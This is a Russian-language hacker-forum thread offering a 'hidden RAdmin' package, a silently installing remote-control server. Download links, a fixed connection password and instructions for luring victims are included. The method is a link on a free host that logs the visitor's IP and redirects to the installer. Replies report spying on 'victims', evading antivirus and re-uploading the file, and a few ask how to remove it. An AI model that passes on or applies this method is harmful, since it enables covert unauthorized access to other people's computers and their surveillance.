Скрытый RAdmin
 

Думаю в этот раздел тема подойдет.
Пароль в текстовом файле указан.
Чтобы узнать ip:
Регистрируемся на www.2ru.name, создаем файл index.php, где пишем:
Это запишет адрес зашедшего в лог файл и перебросит на ссылку с радмином
-------------------
То есть вы даете человеку ссылку вида www.****.2ru.name, он по ней переходит, его редиректит на ссылку с радмином, он запускает, затем смотрим его ip в файле log.txt на сервере и управляем компьютером, или просто наблюдаем, если конечно есть внешний Ip у жертвы.
http://rapidshare.com/files/117121427/radmin.rar
Пароль для соединения: privedmidved

ну и зачем эти скрипты?
не каждый пользователь будет качать и запускать на компе хрен знает какие экзешники.

Кто нить тестил? результаты в студию

все работает отлично

жаль что у радмина нет бэкконнекта- так придется постоянно проверять лог, дабы поймать юзера или сканить диапазон на наличие радминовского порта

Не в обиду но нет ни какой гарантии что это не пинч... Просто вначале пускай протестят люди знающие с опытом а потом и остальные заюзают)

проверка антивирусами
хотел полезным поделиться, а тут не доверяют :mad:

Нет оснований доверять челу у кого 7 постов и 1 репы и то от меня)

Если выложишь видео как это все настраивается и работает тогда тебе многие будут благодарны а пока ждём отзывы

С динамическими IP радмин не пашет?
На сколько я понял файл внутри архива urc.exe это и есть скрытый установщик?

ну может сделаю и видео.
да
пашет, но только до тех пор, пока нету разрыва сессии))))

так ведь с ноября месяца не было разрывов!!!!1

[offtop]отвечайте на мой ответ!!!111[/offtop]

Давай делай видео, с меня ещё плюсеги будут за видео, а то не могу разобраться.

Респект.Работает.Главное чтобы в ближайшее время не пальнули.

а чего там разбиратся?Кинул жертве,у себя в вьювере вписал -пасс и погнал.Пробовал у себя в локалке

Хорошо теперь другой вопрос, как ты будешь узнавать Ip если ты по инету будешь кидать этот скрытый сервер

надеюсь из этого раздела не удалят

так для этого в первом посте есть скриптенг

Эт надо заставить жертву скачать сервер, запустить его и зайти на сайтег, чтоб узнать Ip

нет, жертва заходит на сайт (айпи сразу записался в лог), и редиректит на ссылку с установщиком

В первом посте есть скрипт на редерект, только куда его писать я не знаю(чайник в php)

просто замени ссылку, что непонятного. хотя там и так редиректит на вэбфайл с радмином этим.

доверие тут месяцами получаешь

Теперь вопрос противоположного плана, как эту заразу удалить с зараженного компа

Мало ли просто интересно стало

перезалить на другой файл-хостинг кто-нить может?)

http://www.rapidshare.ru/684050
http://depositfiles.com/files/5588560

протестил снифером, при запуске никуда ниче не отсылалося))))

Можно вот на счет IP попонятнее... непойму где он отображаться должен?

Интересно было наблюдать за жертвой.Но когда я увидел что в процессах у него r_serv я охренел.Он его завершил и я отрубился.Как такое может быть?Предполагаю что у него свой радмин,однако хреново что при его отключение отключается и мой.

r_serv - это сервер радмина. что тебя удивило?
это ж не вьюер

я понимаю что это сервер,но когда я запускаю этот трой,если его можно так назвать,у меня в процессах ничего не появляется.

на сервере в файле log.txt

Да вот напрочь отказывается туда что либо записываться.
на index.php и на log.txt поставил параметр 777

индекс - 644
лог - 666

У меня все IP лежат в log.txt

так чё ни кто не знает как убить эту заразу

в процессах и в windows/где-то там

Посмотри автозапуск здесь (XP):
1) пуск->выполнить->regedit->HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run b и на всякий RunOnce
2) либо пуск->выполнить->msconfig->автозапуск.
если там ничего не найдет, ставь каспера он должен все найти.

Каспер не найдёт, это не трой прога.